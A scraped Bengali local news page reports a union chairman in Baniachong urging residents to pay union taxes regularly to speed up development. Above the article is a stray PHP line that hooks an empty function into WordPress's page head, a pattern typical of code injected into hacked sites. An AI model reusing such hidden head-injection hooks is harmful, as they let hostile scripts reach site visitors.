/***/function add_my_code() { echo ''; } add_action('wp_head', 'add_my_code');/***/ নিয়মিত কর প্রদান করে ইউনিয়নের উন্নয়ন কার্যক্রমকে গতিশীল করুন চেয়ারম্যান হাবিবুর রহমান

,

নিয়মিত কর প্রদান করে ইউনিয়নের উন্নয়ন কার্যক্রমকে গতিশীল করুন চেয়ারম্যান হাবিবুর রহমান

এসএইচ রুবেল, বানিয়াচং থেকে ॥ গতকাল বৃহস্পতিবার রাত ৮টায় ছিলাপাঞ্জা এলাকায় ৬নং ওয়ার্ড মেম্বার মোঃ ছামির আলী সভাপতিত্বে প্রধান অতিথি হিসেবে উপস্থিত ছিলেন ৩নং ইউপির চেয়ারম্যান মাওলানা মোঃ হাবিবুর রহমান। প্রধান অতিথির বক্তব্যে বলেন, নিয়মিত ইউনিয়ন পরিষদের কর প্রদান করে ইউনিয়নের উন্নয়ন কার্যক্রমকে গতিশীল করতে হবে। অন্যান্যের মধ্যে উপস্থিত ছিলেন মহিলা মেম্বার মিরানন্দী, উমর আলী সর্দার হাজী আব্দুল মালিক, মোঃ নবী হোসেন, মোঃ আবু সাইদ, মোঃ আব্দুল মঈন প্রমুখ।


     এই বিভাগের আরো খবর
Copy Protected by Chetan's WP-Copyprotect.